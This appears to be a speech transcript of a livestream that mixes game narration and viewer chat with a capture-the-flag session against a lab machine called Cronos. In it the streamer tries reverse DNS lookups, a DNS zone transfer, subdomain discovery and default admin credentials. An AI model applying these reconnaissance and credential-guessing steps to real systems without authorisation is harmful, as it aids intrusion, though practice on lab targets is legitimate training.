Ouch. Die, you Bakamano. $8,000 something. Oh. Get inside. Oh, we found a wand. Seems to be a good one. Okay. Oh, we also take damage from this. 500. Next, we might have to work around with the DNS entries. I'm not sure, but I feel that if we don't get anything and there is no endpoint to touch, so we will be working with the DNS. Maybe do a reverse DNS lookup kind of thing. We'll check how we can do that. Whoa. The previous one was pretty good. Yep. This one is teleport, nothing good. What is this zigzag? We can get 2 wands if we... It's on shuffle, we don't need this. No shuffle, capacity is low. Pretty good wand. Recharge time is too much. This one is the best wand I can see right now. It seems this has the same power here. So we will keep everything on the other side. The recharge time is too much. So we will add here this and this here. If I'll shoot, what if I shoot? We are less on budget, so let's pick them and leave from here. Again, index.html just found. Ouch, nothing pretty good. We have the acceleration, repelling cape, stain drop at fast rate, faster movements, angry ghost. Any angry spirit comes to your aid, copying nearby spell and projectile. I don't know what is this, but who knows. Okay. Here, this is the new wand. I don't know if... Oh, it didn't. somewhat time left. Okay, after this, if we don't get anything, we will move on to the other stuff. We're not gonna waste much time with this. Mouse killer. Only half of left. Then we will see what we can do. Okay, nothing good. Left from there, we ran away with tail in our legs. Almost finishing. What time do you wake up at morning? Just before the office time, around when 8:30 a.m. Yeah. 8:30. What about you? I think it's already day there, where you are right now. I'll be leaving to sleep around, or like after half an hour. What time it is? It's 11:30. So around 12:30 I'll leave, and around 1 I'll go to bed. We'll sleep. I see. Got it. Now I just have school early morning, 6:30. Man, it's cold. Like, this early school doesn't make any sense. At least wait for sunrise, then call the kids. Well, who am I to comment? Your state, your country, your people, your rule. If someone says something, they'll get boycott. Not just in your country, in every country. In Nepal, 11, 12 are called college. I choose morning shift as it's that early. Oh, gotcha. Early morning study. Yeah, over here people like parents also say wake up early, study early, yeah, stuff. Get over by 10:30 and I have free time to study. What do you study then? Like what's your main? Although I don't think there is any main. When you have multiple subjects, you cannot focus on single subject time. Penetration tester, of course. Nice. So, any project so far have you invested in? Alex Mercer. Alex. Let's see if we have anything good with the DNS over here. How we can check for the reverse DNS. It should be here. Reverse DNS lookup. Yeah, but we tried this. We didn't find anything, did we? Dig -x and we paste. Dang it. With the X we didn't got anything, do we? All we have is the headers, got the answer. Nothing special here. But theory destroy my head. Like it is not that bad. It's as long as you're able to understand the practical side of concept, it is pretty good. Like one need both knowledge. It's not like you can attain something with the single stuff. So yeah, both side of knowledge is required. So found nothing with the FUF. Next we can check for DNS, as we have got this port open. That means we have something there. By the way, why you use big list instead of going with small lists as first? Lists in the sense the brute force one over here, the fuzz, right? Okay, so the logic here is that if I go with the small list, it eventually gonna take the same time, and what I can get in the big one is also contain the same stuff. So rather I'm trying the small ones separately, like 3-4 lists. I would rather prefer to use the bigger one, which has like same kind of combinations and has a certain endpoint to hit. So that's why I preferred the bigger one rather the smaller one. And by the time it's fuzzing on the other side, you don't have to look for like or when it will be complete. When it's complete, it's complete. And with the small one, the issue is you have to keep looking at the screen when it is going to finish, and you can start with the next one. So that's why. So we got another command. Whoa, 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 whoa. Oh, we got something. But it doesn't seem anything worth. Or RSIG, something in base 64, it seems. Till here? No. There's so much to circle around. There is UDP failed to reach. A black hole this. Okay, then I'll go to bed or else I'll miss my college. Yeah, sure. Good night. Have a great night, brother. Maybe see you tomorrow. Although, who knows? But yeah, NS lookup, enter. Look up something. Communication error. Host. Yeah, see you tomorrow, brother. Have a great rest of your night. Or have a great night. Not found. NS lookup. Think the same stuff here. Oh, okay, we got something. And what is this? I think I need to change these two with these. Enter. And now it seems, copy this, paste it here. I need to change this with this one, replace. Yeah, now this look good. So seems we hit a good subdomain over here. As you can see, there is a Kronos.htb, which was unexpected, but we got it, didn't we? Yeah. Let's wipe out some strain from here. I just don't like this. So we're gonna do is replace. Now this looks a bit better. Not that better, but I guess. H double this, replace with empty. Now this looks good. Okay, so we will go to the Kronos, and what we found it is reverse lookup using the specific DNS service or server. And here we used the exclamation double this DNS and over here hash reverse DNS lookup. So it's perform DNS. Which one was it? It was DNS lookup. Was it this one? No, it wasn't this one. It was the other one. Reverse lookup. No, not this one. Let's check here. Perform reverse DNS. No. Right below that lookup. This one. Was it this? Yeah, it was this one. And here is the result. SH. This means we have to add this into the /etc/hosts so we can access this endpoint. And for that, we're gonna use our custom script, which I found pretty useless nowadays. So we will do sudo manage hosts, collie, add new host. This is the IP address and this is going to be the host name. And it seems we made a mistake here, so we're gonna remove the current entry 22. No, we don't want to remove any other entry, so add the host name again, provide the IP address, paste, enter, and copy from here till here, paste it here, and this is a reverse DNS lookup. So if someone is going to call this, it's gonna interact over here. So let's see if we can ping this. Yes, we can ping this. And can we ping this? I'm not sure though, but yep, name and service not none. So we're gonna copy till here, paste it here, and go put up, copy this, and add here. Now we have the new host added into the /etc/hosts. Let's visit this page. So we're gonna check on this, enter. Oh, http:// / paste, enter. Ouch. Again messed up. Okay, I think we added the wrong stuff, but do we still need to check something else? I don't think we need to add all of this, so what else can we check over here? We don't need the host, so we are still in the tool. Yes, no. Let's try to remove the entry. I don't think we need it anyway. So let's see. The IP address DNS server. Let's try this. NS lookup. And the server, and before that we're gonna provide the IP address. What does it? Okay, let's try with the dig AFX over here. Close this, copy this all, paste, and put at here, enter. Okay, now, oh, we got some entries. Transfer failed. But if I do this at 10.10.10.13, enter. Failed, enter. Nothing. I thought there could be another entries that we might be able to find, but doesn't seems like we'll be able to get anything else from here. But let's remove all of this, enter. Global entries, there is new IP address. I don't know where it's connecting, but the transfer is failed. What next? We can check. Host, no. Reverse lookup with detail output in host. So if I do host -a and paste the IP address, enter. It does show reverse lookup, but if I'll go with this, it says not found. That means we are looking for the wrong stuff. Are we? No. Let's copy this. We'll perform dig on it, and we're gonna do ptr, enter. And in the response, we got anything? No. If I try host -t ptr and paste the IP address, enter. Nothing. What else can we get? Can we try the same command? NS lookup over here. But this time we're gonna use this, enter. Not found anything. So what if I do this? Okay, it did found the server address and stuff, but we need more than that. In a way, we can get more information on this. Reverse lookup with additional details. Dig plus short -x, paste, enter. Nothing. trace. Okay, we got stuff, but not worth. Let's check. Reverse. Okay, we can try this. Hyphen X. We're gonna give it 10.10.10.13. Enter. What if I'll do copy this, paste here, enter, and nope, no chance. Dig all this, add hyphen X, DNS server, not able to get anything. DNS sec, nothing. Authority section. Let's clear this. What can we do to pull something new? I don't think the NS is going to be there. Security forced. Dig is not gonna work with the AXFR. We have this with this, and we are just getting the garbage, which is failed transfer. This at, and this is not working, so no meaning of performing the domain transfer. What is it that we are missing? Try zone transfer. Yeah, I tried that, but it is not working. You see, transfer failed. It's not able to pull anything. So let's try with this. I think we're gonna use it some way. Let's try if we can add the host into the SD host. Sudo manage host. No, the command is right because I have used it previously, so I know the command is correct. Add host 10.10.10.13. Enter. Chronos.htb. Enter. And if we'll try this same command here, what we'll get? Transfer failed. CRONOS, Chronos. What's different here? Let's see if I'll go here and try this. Instead of this, we put add here, enter. Whoa, we got it, but I think server will be first. It doesn't matter, bro. It just need something to be there. Okay, let's try with this. If we remove this entry, now entry has been removed, so we'll clear this out, and if I try the same thing again, it is working. Okay, So yes, we got something after pretty long. Let's also try the zone transfer on the DNS with name chronos.htb. We're gonna use the DNS. Over here we have hashtag domain transfer was somewhere here. Perform a domain transfer. And if I'll put the exclamation here, yes, this one. So we was just performing in the wrong variation. The @ actually was needed to be put over the IP address instead of the domain name. So let's go with that variation pretty quick. Remove this, but we thought before that, let's copy it and paste here and enter. There we go. We got good stuff. Looking for hidden domains or subdomains. Okay. Cause I don't think we need to add that. Foothold is not there yet, so we can remove this. Now if we look, one, two, three, four, five. Domain, or sorry, zone transfer. To get the other subdomains. Using dig. Okay, we don't have something separate for the dig, but ns lookup. Okay, we don't have anything for both, so we'll do dig and ns lookup. There we go. But we have the reverse entry, so we can check it. Not here. Let's put it here. And the tags we have so many tags here. So let's add them into the /etc/hosts and see what we can do around these. Now we're gonna need the tool that we have created, so we will do sudo manage hosts, add new host 10.10.10.13, enter cronos.htp, enter. We're not gonna add any new host, but we wanna append it for the subdomain. We will select this and we'll start throwing stuff in there. Next one is, I don't think this is required, but who knows. 2 dub. Sometime this also redirect to some weird stuff, so we will add this too. Now we have everything in the list, so we go all the way up and paste here. We're gonna perform the snip. I think we need to perform the snip from here. No. Snip here. And the same snip here. Now this looks good. Now we have double hosts. Let's surf them and see what do they hold. So we can cancel this and clear this with the same method, clear this, and now we have admin.cronos.htp. Like I said in the start, I was having a gut feeling that we might be like tampering with the subdomain, and that's what actually happened, and we are tampering with that. And it seems we are already 3 hours up. So what do you guys say? Should we leave or we continue? If continue, for how much time? Because I'll be running late then for my work tomorrow. So let's serve the admin.cronos.htp first. I'm also running late for office. Yeah, so you're watching my stream like this early. Nice. At least someone is interested in learning, sharing, and other stuff. So yeah, pretty good. Thanks for being here, brother. And we have got the not this one, login page here. But we don't have any username and password right now. I'm also completed one room on try me. Oh, nice. Pretty good. I'm thinking to start the try hack me too, because that list is a bit shorter, but I am short on funds, so I cannot buy the subscription right now. And as far as I can see, all these are the part of the subscription module. And subscription is pretty costly here. Let's see. How much is it? If we go to tryhackme.com and go to pricing, let's just log in. 4,000 approx. Yeah, it is still costly. I don't have that much to spend on it. Subscribe now. Yeah, no, it's not a 4,000, it's like 5,000 almost. I don't know when I'll be buying it, but I'm thinking to start this one too. Someday, if someone will have enough to fund me, maybe. If someone is watching who can support, just type the support here and you will get the link. Else you can find the link in the description, which will help me get the content. Here you go. Click that link. It'll take you somewhere and you might be able to support me there. And let's keep continue with this. We will also check what's over here. http://www.cronos.htb enter. And I think this is there we go. I told you, right? The actual subdomain might be holding, or like actual redirection might be holding something different. And it took us to Laravel. Now this is going to become a pretty damn good note. So let's go back to here. So let's visit. They also don't have the money to buy on, but one of my friends sponsor me the voucher. Oh, nice. Pretty good friends though. GG. www.cronos.htb. Man, this is only reason why sometime one is not able to perform much better. Funds. Exhausted funds are curse. And as I SPCTED, the other subdomain holds the different page, or we say that the www subdomain is over the different redirection that is not visible to everyone. So if someone like it is not mapped to the same IP address, as it will have taken to different route, but it is mapped with some other IP address which is not the actual one. Because of that, it is going to the other places. And if we'll see over here, the dub, oh no, not the IP address, maybe some other endpoint it might be added to. And it says plus CMD global option. Let's try this. Dig this, and if I do plus CMD, enter. Yeah, communication error. Oh, it is because it's not an IP address. No, I think we are doing right. Yeah, we are doing right. Global option plus CMD. So does that mean we can just use this? And in the answer we didn't got anything. So if we will do this instead, it's gonna give the connection error. And what about this? Yeah, just making fool out of us. Okay, now let's check these endpoints and see what we have here. Endpoint of so if we'll do where is the FUF scan domain transfer over here. God. We will remove this. It's www.cronos.htb, and we're gonna copy this. Subdomain found from domain transfer. Dub and copy this, paste here, enter. Okay, I think I have dig notes look good. Brother, it's like 5-year worth of preparation. What do you think? Not a preparation, but what we say, yeah, 5 years worth of notes. I'm taking notes of everything since I think more than 5 years. Maybe wrong, but yeah, more than 5 years. -TOFL 12, enter. Let's go. I'll make them public someday, but yeah, right now the problem is only funding. Funding is the only thing that I'm having problem right now. That's why I tell people subscribe, help me reach some stage and like the video so it can reach to others too, so I can like raise something out of it and I can share it with others. But people don't contribute enough. If you see, let's see how many subscribers we have today. It was 795 yesterday. See, only 15 or 16 increment. How are we gonna do that? Tell me. This doesn't put the game. And on the same note, if we'll check this, I cannot start the membership or the stuff right now because of this, the watch hours. We need 3000 over here. And again, the same thing, people don't subscribe, it won't recommend to everyone else. Because of that, I'm gonna stick with this low number. Like, this is a calculation of whole 1 year. Do you believe that? Only this much? Or should I start throwing the videos again? If I start throwing the videos again, I might not be able to come for live. And because of that, it'll break my balance. Like, creating a video takes Wi-Fi hacking. Where did you saw that? Yeah, people do watch weird stuff. But knowledge is a knowledge, whatever source it is coming from, because now those who are watching the Wi-Fi hacking, they will be looking for like how the signal works, how the like network, how the LAN work, how router work. So it is just something out of something. So people plug those things out and try to find something in there, and that help them grow, and that's how the curiosity keep people alive, right? Documentation, and it's actually redirecting us to the actual Laravel. Let's check what we have here over the view source code. Once I'll start earning, I'm going to buy the good subscriptions, and the second thing is going to be I need to buy the good system after the subscriptions, so I can do the live properly. As you can see, how laggy is this. Forge.laravel. Okay, it doesn't seem like we have anything over here. Even this is not able to find anything. So people, support this channel. I'm not sure if we'll get anything from here though. How much time did it took someone to complete? Whoa! 18 days worth of investment. for the user blood. Damn. 18 days. But after those 18 days, one got it into like next 4 hours. He got the root flag. The user itself took like 18 days. What the hell are they doing, man? White box, command injections, stuff. Pretty nasty. Let's go with the guided mode. How many ports are there? Bye bye, going to sleep, otherwise it'll be late. Yeah, sure, go ahead. See you tomorrow, man. Come a bit faster. What's some subdomain of cron tab is serving as login page over the HTTP? It's admin. No, dub. No. How we gonna do is it was admin. What subdomain of chronos.htp is serving as okay, it was looking for the full name, and next it's saying what is the heading at the top of web page once authenticated. Yo, what? We have this running, so we will do not this, nice nuclei admin dot chronos.htp. Let's see what we get. What will we get? What will we get? Like, see, the CPU is like 99% utilization. Crazy, right? Only just 2 tools are running. And can we try the default here? Admin password, and don't tell me it worked. Don't tell me it worked. Oh, congratulations, machine died. Machine died. Cool. Okay, it's back to life. Is it going to log in? Is it? And what do we have here? Oh, it's PHP. Oh, we have the robots.txt. Let's copy this. Go to this endpoint and slash robots.txt. Enter. Okay, web.config, we got a new endpoint. I think we can use the curl here. It's gonna keep loading. Okay, it died, nuclei died. So we'll use the curl, paste, enter. What do we have at this endpoint? Web config. I think I remembered this. This happened over some other endpoint. Not endpoint, but some other box. Where we tampered with the web config file and we was able to create the XML file using the same, and when we did, we was able to get the RCE using that, because it was also using the I'm not sure about if it was the ASP or the PHP. One of those was getting used there. Okay, it couldn't render it. If I do this, ouch. Enter. App.css. Connection reset by peer. Okay, this is working, and if I'll clear this and try this now, will it work? Web.config. I think loading has been stopped and the connection died, which is weird. Maybe because of these requests, the server is not able to breathe properly and dying again and again and taking this much time to load. Okay, it's back. I think this gonna die again. It doesn't matter if it's with the HTTP or without HTTP. Not able to render. Just stop, brother. If I do -v, enter. Request completely sent off. The host is resolving, so that's not a problem. If we go with -x head, what will it do? Connection has been established. Okay, no action. I think we will let it run the way it is running. So those who have watched, thanks guys for being here. Those who are watching afterwards, thanks guys for watching, and please consider subscribing, like the video and share with others. Drop a comment if there is something that you are not able to understand. And I believe with that said, have a great rest of your day. If you're other part of zone, have a great rest of your day. If you're in same zone as me, have a great night or have a great rest of your night. I'll see you guys tomorrow. Till then, keep subscribing, liking the video, and comment down if you didn't got anything and share with others. I'll see you guys tomorrow. Till then, have a great time. Bye bye.